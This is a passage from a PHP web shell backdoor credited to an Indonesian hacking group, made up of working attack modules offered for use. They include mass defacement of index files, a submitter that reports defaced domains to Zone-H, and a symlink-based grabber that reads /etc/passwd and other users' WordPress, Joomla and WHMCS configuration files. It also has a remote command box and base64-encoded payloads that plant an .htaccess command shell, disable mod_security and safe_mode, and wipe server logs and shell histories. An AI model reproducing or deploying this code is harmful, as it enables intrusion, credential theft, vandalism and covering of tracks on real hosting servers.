2104.  echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2105.  $dcount++;}
2106.  fclose($file);
2107.  echo "</table></div></center>";unlink("test.txt");
2108.  } else
2109.  echo "<center><font size=4>Cannot create Symlink</font></center>";
2110.  }
2111.  }
2112.  }
2113. }
2114. /////////////////////////////////////////////////////////////////
2115. /////////////////////////////////////////////////////////////////////////////////////////////
2116.  
2117.  
2118. elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2119. {
2120. echo "
2121. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2122.  
2123.     <tr>
2124.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2125.     <center><b><font size=5 style=italic color=#00ff00>Mass Deface</font></b></center></td></tr></table>
2126. ";
2127. error_reporting(0);?>
2128. <form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2129. <td><table><table class="tabnet" >
2130.  
2131. <th colspan='5'><b>Folder Mass Deface</b></th>
2132. <form hethot='post'>
2133. <tr>
2134.     <tr>
2135.     <td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' style='background:black;' type='text' name='path' size='60' value="<?=getcwd();?>"></td>
2136.     </tr><br>
2137.     <tr>
2138.     <td>File Name</td><td><input class ='inputz' style='background:black;' type='text' name='file' size='60' value="index.html"></td>
2139.     </tr>
2140. </tr>
2141. <table class="tabnet" >
2142. <th colspan='5'><b>File Code Mass Deface</b></th>
2143. <tr><td></td><td>
2144. <table><textarea align="center" style='background:black;' name='index' rows='15' cols='80'><?=$script_deface; ?></textarea><br>
2145. <center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Mass Deface&nbsp;&nbsp;"></center></form></table></table></table></table>
2146. <br></form>
2147. <?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
2148. /////////////
2149. /////////////////////////////////////////////////////////////////
2150.  
2151. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
2152. {   @ini_set('output_buffering',0);
2153. echo "
2154. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2155.  
2156.     <tr>
2157.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2158.     <center><b><font size=5 style=italic color=#00ff00>Zone-H Submiter</font></b></center></td></tr></table>
2159. ";
2160. ?>
2161. <form action="?y=<?=$pwd; ?>&amp;x=zone" method="post">
2162.  
2163. <br><br><center>
2164. <!-- Zone-H -->
2165. <form action="" method='POST'><table><table class='tabnet'>
2166. <td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><b>Zone-H Defacer</b></th></tr></td></tr><td height='45' colspan='2'><form method="post">
2167. <input type="text" class="inputz" name="defacer" style="background:black;" placeholder="Name Of Defacer" />
2168. <select name="hackmode" class="inputz" >
2169. <option >---------------------------Select One---------------------------</option>
2170. <option value="1">Known Vulnerability (i.e. Unpatched System)</option>
2171. <option value="2" >Undisclosed (new) Vulnerability</option>
2172. <option value="3" >Configuration / Admin Mistake</option>
2173. <option value="4" >Brute Force Attack</option>
2174. <option value="5" >Social Engineering</option>
2175. <option value="6" >Web Server Intrusion</option>
2176. <option value="7" >Web Server External Module Intrusion</option>
2177. <option value="8" >Mail Server Intrusion</option>
2178. <option value="9" >FTP Server Intrusion</option>
2179. <option value="10" >SSH Server Intrusion</option>
2180. <option value="11" >Telnet Server Intrusion</option>
2181. <option value="12" >RPC Server Intrusion</option>
2182. <option value="13" >Shares Misconfiguration</option>
2183. <option value="14" >Other Server Intrusion</option>
2184. <option value="15" >SQL Injection</option>
2185. <option value="16" >URL Poisoning</option>
2186. <option value="17" >File Inclusion</option>
2187. <option value="18" >Other Web Application Bug</option>
2188. <option value="19" >Remote Administrative Panel Access Bruteforcing</option>
2189. <option value="20" >Remote Administrative Panel Access Password Guessing</option>
2190. <option value="21" >Remote Administrative Panel Access Social Engineering</option>
2191. <option value="22" >Attack Against Administrator(Password StealingSniffing)</option>
2192. <option value="23" >Access Credentials Through Man In the Middle Attack</option>
2193. <option value="24" >Remote Service Password Guessing</option>
2194. <option value="25" >Remote Service Password Bruteforce</option>
2195. <option value="26" >Rerouting After Attacking The Firewall</option>
2196. <option value="27" >Rerouting After Attacking The Router</option>
2197. <option value="28" >DNS Attack Through Social Engineering</option>
2198. <option value="29" >DNS Attack Through Cache Poisoning</option>
2199. <option value="30" >Not available</option>
2200. </select>
2201.  
2202. <select name="reason" class="inputz" >
2203. <option >---------------Select One-----------------</option>
2204. <option value="1" >Heh...Just For Fun!</option>
2205. <option value="2" >Revenge Against That Website</option>
2206. <option value="3" >Political Reasons</option>
2207. <option value="4" >As a Challenge</option>
2208. <option value="5" >I Just Want To Be The Best Defacer</option>
2209. <option value="6" >Patriotism</option>
2210. <option value="7" >Not Available</option>
2211. </select>
2212. <input type="hidden" name="action" value="zone"><tr><td>
2213. <center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains" placeholder="List Of Domains"></textarea>
2214. <br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
2215. </form></td></tr></table></form>
2216. <!-- End Of Zone-H -->
2217. </td></center><br><br>
2218.  
2219. <?php
2220. function ZoneH($url, $hacker, $hackmode,$reson, $site )
2221. {
2222.     $k = curl_init();
2223.     curl_setopt($k, CURLOPT_URL, $url);
2224.     curl_setopt($k,CURLOPT_POST,true);
2225.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2226.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2227.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2228.     $kubra = curl_exec($k);
2229.     curl_close($k);
2230.     return $kubra;
2231. }
2232. {
2233.                 ob_start();
2234.                 $sub = @get_loaded_extensions();
2235.                 if(!in_array("curl", $sub))
2236.                 {
2237.                     die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
2238.                 }
2239.              
2240.                 $hacker = $_POST['defacer'];
2241.                 $method = $_POST['hackmode'];
2242.                 $neden = $_POST['reason'];
2243.                 $site = $_POST['domain'];
2244.                 if (empty($hacker))
2245.                 { die ("<center><b> </b></center>"); }
2246.                 elseif($method == "--------SELECT--------")  
2247.                 { die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>"); }
2248.                 elseif($neden == "--------SELECT--------")  
2249.                 {  die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>"); }
2250.                 elseif(empty($site))  
2251.                 { die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>"); }
2252.                 $i = 0;
2253.                 $sites = explode("\n", $site);
2254.                 while($i < count($sites))  
2255.                 {
2256.                     if(substr($sites[$i], 0, 4) != "http")  
2257.                     {
2258.                         $sites[$i] = "http://".$sites[$i];
2259.                     }
2260.                     ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
2261.                      echo "$sites[$i]";
2262.                     ++$i;
2263.                 }
2264.  
2265.             }
2266.  
2267.    
2268. }
2269. /////////////////////////////////////////////////////////////////////////////////////////////
2270. ////////////////////////////////////////////////////////////////////////////
2271. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
2272. echo "
2273. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2274.  
2275.     <tr>
2276.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2277.     <center><b><font size=5 style=italic color=#00ff00>Config Grabber</font></b></center></td></tr></table>
2278. ";
2279. ?>
2280.     <form action="?y=<?=$pwd; ?>&x=grabc" method="post">
2281.  
2282. <?php
2283. echo "
2284. <form method='POST'>
2285. </head>
2286. <style>
2287. textarea {
2288. resize:none;
2289. color: #000000 ;
2290. background-color:#000000;  
2291. font-size:8pt; color:#ffffff;
2292.  
2293. width:550px;
2294. height:400px;
2295. }
2296. input {
2297. color: #000000;
2298. border:1px dotted white;
2299. }
2300. </style>";
2301. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><br><form method="POST"><table class="tabnet" >
2302. <th colspan='5'><b>Config Grabber</b></th></center>
2303. <tr><td></td><td><table><textarea name="passwd" class='area' rows='15' cols='60'><?=file_get_contents('/etc/passwd'); ?></textarea><br>
2304. <center><input name="config" style="width:550px;" class='inputzbut' value="&nbsp;&nbsp;Grab!&nbsp;&nbsp;" type="submit"></form></center></table></table>
2305. <?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('explodedcgrab', 0755);@chdir('explodedcgrab');
2306. $htaccess="
2307. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2308. Options Indexes FollowSymLinks
2309. ForceType text/plain
2310. AddType text/plain .php
2311. AddType text/plain .html
2312. AddType text/html .shtml
2313. AddType txt .php
2314. AddHandler server-parsed .php
2315. AddHandler txt .php
2316. AddHandler txt .html
2317. AddHandler txt .shtml
2318. Options All
2319. Options All
2320. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
2321. Options Indexes FollowSymLinks
2322. ForceType text/plain
2323. AddType text/plain .php
2324. AddType text/plain .html
2325. AddType text/html .shtml
2326. AddType txt .php
2327. AddHandler server-parsed .php
2328. AddHandler txt .php
2329. AddHandler txt .html
2330. AddHandler txt .shtml
2331. Options All
2332. Options All";
2333. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
2334. $passwd=explode("\n",$passwd);
2335. echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";
2336. foreach($passwd as $pwd){
2337. $pawd=explode(":",$pwd);$user =$pawd[0];
2338. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
2339. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
2340. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
2341. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
2342. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
2343. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
2344. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
2345. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
2346. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
2347. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
2348. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
2349. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
2350. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
2351. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
2352. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
2353. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
2354. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
2355. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
2356. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
2357. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
2358. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
2359. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
2360. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
2361. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
2362. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
2363. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
2364. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
2365. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
2366. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
2367. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
2368. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
2369. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
2370. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
2371. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
2372. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
2373. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
2374. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
2375. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
2376. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
2377. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
2378. echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="explodedcgrab">Open configs</a></font></b>';}
2379. }
2380.    ////////////////////////////////////
2381. elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
2382.     {@ini_set('output_buffering',0);
2383.         echo "
2384. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2385.  
2386.     <tr>
2387.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2388.     <center><b><font size=5 style=italic color=#00ff00>About</font></b></center></td></tr></table>
2389. ";
2390.     ?><form action="?y=<?=$pwd; ?>&x=about" method="post"><center><br><br><div class='msupiani'><img src='http://oi58.tinypic.com/2u8fmnn.jpg'/></div>
2391. <br><br><br><font size="10" color="#00ff00"><b>Thanks To :</b><br><br><br></font></center><center><marquee direction="up" scrollamount="2" bgcolor="" width="250" height="100"><center>
2392. <p><b><font size="3" color="#00ff00">Allah S.W.T<br><br>My Parent<br>Yulia Susanti<br>All Member Security Exploded<br>1N73CTION<br>B374K<br>AnonGhost<br>WSO<br>C100<br>BlackShadow<br>Madspot<br><br>
2393. =[ Grub & Forum ]=<br><br>Pentest & Security Indonesia<br>Kali Linux Indonesia<br>Surabaya Black Hat<br>Indonesian Backtrack Team<br><br><br><br>By<br>Security Exploded a.k.a ./Port22<br><br>Special Present To :<BR><center><img src="http://www.clker.com/cliparts/W/q/D/p/e/7/small-red-heart-with-transparent-background-hi.png" width='20' height='20'></center>Yulia Susanti<br><br>18 Mar 2014<br>
2394. </font></b></p></center></marquee></center><embed src="<?=$music;?>" autostart="TRUE" loop="TRUE" width="0" height="0"></embed><br><br><br>
2395. <?php
2396. }
2397. /////////////////////////////////////
2398. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){  ?><form action="?y=<?=$pwd; ?>&amp;x=shell" method="post"><table class="cmdbox">
2399. <tr><td colspan="2"><textarea class="output" readonly><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']);} ?></textarea>
2400. <tr><td colspan="2"><?=$prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
2401. </table></form><?php }
2402. else {
2403. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
2404.     $file = $_GET['delete'];
2405.     @unlink($file);
2406. }
2407. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
2408.     @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
2409. }
2410. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
2411.     $path = $pwd.$_GET['mkdir'];
2412.     @mkdir($path);
2413. }
2414.     $buff = showdir($pwd,$prompt);
2415.     echo $buff;
2416. }
2417. //////////////////////////////////////
2418. ?>
2419. <br><table class="tabnet" >
2420. <tr><form method="post" action="">&nbsp;<td><select class="inputzbut" align="left"  name="pilihan" id="pilih"><option value=""selected>------[ Select Your Favorit Tools ]------</option><option value="htasell">htaccess Shell [ .htaccess ]</option><option value="slc" >Server Log Cleaner [ serverLC.sh ]</option><option value="ini">Bypass Disable Function in Apache</option><option value="inis">Bypass Disable Function in Litespeed</option></select>
2421. <input  type="submit" name="submites" class="inputzbut" value="Created">
2422. </td></form></tr></table>
2423. <?php
2424. $submit = $_POST ['submites'];
2425. if(isset($submit)) {
2426.     $pilih = $_POST['pilihan'];
2427.         if ( $pilih == 'ini') {
2428.             $byphp = "safe_mode = Off \n disable_functions = None \n safe_mode_gid = OFF \n open_basedir = OFF \n allow_url_fopen = On";
2429.             $byht = "<IfModule mod_security.c> \n SecFilterEngine Off \n SecFilterScanPOST Off \n  SecFilterCheckURLEncoding Off \n  SecFilterCheckUnicodeEncoding Off \n  </IfModule>";
2430.             $iniphp = '<? \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2431.             file_put_contents("php.ini",$byphp);
2432.             file_put_contents(".htaccess",$byht);
2433.             file_put_contents("ini.php",$iniphp);
2434.             echo "<script>alert('Disable Functions in Apache Created'); hideAll();</script>";
2435. die();
2436.         }
2437.         elseif ( $pilih == 'inis') {
2438.         $iniph = '<?php \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["file"]); \n ini_restore("safe_mode"); \n ini_restore("open_basedir"); \n echo ini_get("safe_mode"); \n echo ini_get("open_basedir"); \n include($_GET["ss"]; \n ?>';
2439.              $byph = "safe_mode = Off \n disable_functions= ";
2440.         $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
2441.         file_put_contents("php.ini",base64_decode($byph));
2442.         file_put_contents("ini.php",base64_decode($iniph));
2443.         file_put_contents(".htaccess",base64_decode($comp));
2444.         echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
2445. die();
2446.         }
2447.        
2448.         elseif ( $pilih == 'slc') {
2449.         $slc ="IyEvYmluL3NoDQojIFJlY29kZWQgQnkgLi9Qb3J0MjIgKE1TdXBpYW4pDQojIEdyMzN0eiA6IEFsbCBNZW1iZXJzIE9mIFNlY3VyaXR5IEV4cGxvZGVkDQojIGNobW9kIDA3NTUgc2VydmVyTEMuc2ggPj4gLi9zZXJ2ZXJMQy5zaA0KDQplY2hvICJbKl0gR29pbmcgVG8gRGVsZXRlIExvZyBTZXJ2ZXJzIC4uLiAiDQpmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsNCmZpbmQgLyAtbmFtZSAibG9nKiIgLWV4ZWMgcm0gLXJmIHt9IFw7DQpmaW5kIC8gLW5hbWUgKi5sb2cgLWV4ZWMgcm0gLXJmIHt9IFw7DQpybSAtcmYgL3RtcC9sb2dzDQpybSAtcmYgJEhJU1RGSUxFDQpybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5DQpybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5rc2hfaGlzdG9yeQ0Kcm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dA0Kcm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MNCnJtIC1yZiAvdXNyL2xvY2FsL2FwYWNoZS9sb2cNCnJtIC1yZiAvdmFyL2FwYWNoZS9sb2dzDQpybSAtcmYgL3Zhci9hcGFjaGUvbG9nDQpybSAtcmYgL3Zhci9ydW4vdXRtcA0Kcm0gLXJmIC92YXIvbG9ncw0Kcm0gLXJmIC92YXIvbG9nDQpybSAtcmYgL3Zhci9hZG0NCnJtIC1yZiAvZXRjL3d0bXANCnJtIC1yZiAvZXRjL3V0bXANCg0KZWNobyAiWypdIERvbmUgLiBHb29kIEx1Y2sgOyki";
2450.         file_put_contents("serverLC.sh",base64_decode($slc));
2451.         echo "<script>alert('Server Log Cleaner [ serverLC.sh ] Created'); hideAll();</script>";
2452.         die();
2453.         }
2454.         elseif ( $pilih == 'htasell') {
2455.         $ht = 'PEZpbGVzIH4gIl5cLmh0Ij4NCk9yZGVyIGFsbG93LGRlbnkNCkFsbG93IGZyb20gYWxsDQo8L2ZpbGVzPg0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3MNCiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg0K';
2456.         file_put_contents(".htaccess",base64_decode($ht));
2457.         echo "<script>alert('htaccess Shell [ .htaccess ] Created : open in site/.htaccess?cmd= '); hideAll();</script>";
2458.         die();
2459.         }
2460.        
2461.     }
2462.    
2463. ?><br><br> <div class="footer"><b style="color:$color;font-family:monotype corsiva;font-size:22;"><?=$title; ?> <?=$versi ?> Shell Backdoor</b></div>
2464. <div class="jaya">  &copy; <?=date('Y',time()); ?> <a href=""><?=$xName ?></a></div></div>
2465. </body>
2466. </html>